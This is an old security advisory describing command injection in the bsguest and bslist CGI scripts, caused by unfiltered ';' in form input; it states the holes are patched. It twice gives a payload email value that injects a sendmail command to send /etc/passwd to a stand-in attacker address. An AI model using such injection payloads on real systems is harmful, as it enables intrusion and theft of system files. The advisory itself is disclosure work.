BS Scripts Vulnerabilities

[rivendell_team () YAHOO COM]

++++++++++++++++++++++++++++++++++++
BS Scripts Multiple CGI Vulnerabilities
Discovered by Elf (whitehatjoe () hotmail com)
Greetz: 0x7f, CompSci, Dugnet
++++++++++++++++++++++++++++++++++++

Info

There are a couple of scripts from bsScripts 
(www.stanback.net) , that have holes in them 
because the author did not filter out ; from the form 
input.  The scripts that this affects is bsguest (a 
guestbook script) and bslist (a mailing list script).  
The hole allows anyone to execute commands on the 
server.  The author has been informed and the holes 
are now patched in the latest release.

-bsguest.cgi-

BSGuest does not filter out ; resulting in the ability for 
anyone to execute commands on the server.  The 
attacker just enters his email address 
as 'hacker () example com;/usr/sbin/sendmail 
hacker () example com < /etc/passwd', and then the 
server mails a confirmation letter along with the 
passwd file to the attacker.

-bslist.cgi-

BSList also doesn't filter out the ; and once again 
anybody can execute commands on the server.  This 
can be exploited by signing up for the mailing list with 
the email address of 

'hacker () example com;/usr/sbin/sendmail 
hacker () example com < /etc/passwd'

+++++++++++++++++++++++++++++
"It's funny how impossible dreams manifest" - 
Cypress Hill
EOF
+++++++++++++++++++++++++++++